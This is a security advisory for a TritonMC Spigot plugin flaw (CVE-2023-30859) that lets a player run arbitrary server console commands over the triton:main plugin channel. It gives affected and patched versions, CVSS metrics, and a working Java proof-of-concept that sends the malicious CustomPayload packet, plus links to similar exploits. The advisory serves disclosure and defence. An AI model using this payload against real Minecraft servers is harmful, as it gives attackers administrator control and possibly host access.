
Arbitrary command execution on Spigot console by malicious player

High
diogotcorreia published GHSA-8vj5-jccf-q25r Apr 30, 2023

Package

TritonMC (Spigot Plugin)

Affected versions

>= 3.8.0, <= 3.8.3
<= 3.7.4

Patched versions

3.8.4
3.7.5

Description

Summary

A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.

Details

When bungeecord mode is enabled in the config, the plugin enables the proxy bridge and the server begins to broadcast the triton:main plugin channel.
Triton uses this channel for communication between the proxy and the server (and vice versa); among other actions, it lets the proxy tell the server to execute any command as the console.

Triton did not filter incoming plugin messaging packets from players, so a modded client could send a packet that let it execute any command it wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for privilege escalation on the Minecraft server, and perhaps even RCE on the host machine itself.

Using this plugin channel, the malicious player is able to send a payload packet containing a byte (2) and a string (any Spigot command).
Other payloads could also be sent, which could mess with the server's translations, for instance, but those are less powerful than the above payload.

Proof of Concept

Demonstration video:
POC Video

Demonstration code:

// This is for version 1.8; for later versions the code will change slightly
private void triton(String command) {
    try {
        ByteArrayOutputStream b = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(b);
        out.writeByte(2); // Sub Channel ID
        out.writeUTF(command); // Command
        PacketBuffer buffer = new PacketBuffer(Unpooled.buffer());
        buffer.writeBytes(b.toByteArray());
        mc.thePlayer.sendQueue.addToSendQueue(new C17PacketCustomPayload("triton:main", buffer));
    } catch (Exception e) {
        e.printStackTrace();
    }
}

This is similar to the following exploits:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit

Impact

This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have bungeecord set to true in Triton's config.yml, whether or not they are actually behind BungeeCord or Velocity.

Severity

High


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

CVE ID

CVE-2023-30859
